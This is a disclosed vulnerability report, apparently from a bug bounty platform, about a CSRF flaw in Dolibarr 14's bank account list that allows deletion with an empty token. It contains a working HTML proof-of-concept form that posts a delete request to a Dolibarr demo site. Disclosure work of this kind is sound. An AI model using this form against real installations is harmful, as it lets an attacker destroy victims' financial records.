Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr
Valid
Reported on
Jul 21st 2021
✍️ Description
In Bank section the Bank | Cash part, you protect List entities to delete with CSRF attacks but if I set CSRF token to nothings then I able to delete arbitrary List entities only with knowing their ids.
🕵️♂️ Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.dolibarr.org/compta/bank/list.php" method="POST">
<input type="hidden" name="token" value="" />
<input type="hidden" name="formfilteraction" value="list" />
<input type="hidden" name="action" value="list" />
<input type="hidden" name="sortfield" value="b.label" />
<input type="hidden" name="sortorder" value="ASC" />
<input type="hidden" name="contextpage" value="bankaccountlist" />
<input type="hidden" name="page" value="0" />
<input type="hidden" name="search_status" value="opened" />
<input type="hidden" name="pageplusoneold" value="1" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="token" value="" />
<input type="hidden" name="confirm" value="yes" />
<input type="hidden" name="search_ref" value="" />
<input type="hidden" name="search_label" value="" />
<input type="hidden" name="search_status" value="opened" />
<input type="hidden" name="selectedfields" value="b.ref,b.label,accountype,b.account_number,b.fk_accountancy_journal,toreconcile,b.datec,b.tms,b.clos,balance," />
<input type="hidden" name="toselect[]" value="256" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of delete mentioned List entities from tools section. version of application == 14 (tested on demo website)
We have contacted a member of the
dolibarr
team and are waiting to hear back
2 years ago
amammad modified the report
2 years ago
to join this conversation